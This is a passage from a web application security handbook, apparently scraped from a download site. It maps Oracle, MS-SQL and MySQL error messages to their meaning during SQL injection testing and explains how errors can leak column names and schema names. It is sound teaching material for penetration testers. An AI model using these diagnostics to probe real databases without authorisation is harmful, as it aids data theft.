The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

MySQL:

You have an error in your SQL syntax.  Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near ‘ XXX , YYY from SOME_TABLE’ at line 1

Translation:

You commonly see this error message when your injection

point occurs before the 

FROM

keyword (for example, you have

injected into the columns to be returned) and/or you have

used the comment character to remove required SQL

keywords.

Try completing the SQL statement yourself while using your

comment character.

MySQL should helpfully reveal the column names XXX, YYY

when this condition is encountered.

Oracle:

ORA-00972: identifier is too long

MS-SQL:

String or binary data would be truncated.

MySQL:

N/A

Translation:

This does not indicate SQL injection. You may see this error

message if you have entered a long string. You’re not likely to

get a buffer overflow here either, as the database is handling

your input safely.

Oracle:

ORA-00942: table or view does not exist

MS-SQL:

Msg 208, Level 16, State 1, Line 1

Invalid object name ‘foo’

MySQL:

Table ‘DBNAME.SOMETABLE’ doesn’t exist

Translation:

Either you are trying to access a table or view that does not

exist, or in the case of Oracle, the database user does not

have privileges for the table or view. Test your query against a

table you know you have access to, such as 

DUAL

. 

MySQL should helpfully reveal the current database schema

DBNAME

when this condition is encountered.

Oracle:

ORA-00920: invalid relational operator

MS-SQL:

Msg 170, Level 15, State 1, Line 1

Line 1: Incorrect syntax near foo

MySQL:

You have an error in your SQL syntax.  Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near ‘’ at line 1

Translation:

You were probably altering something in a 

WHERE

clause, and

your SQL injection attempt has disrupted the grammar.

Download 5,76 Mb.

Do'stlaringiz bilan baham: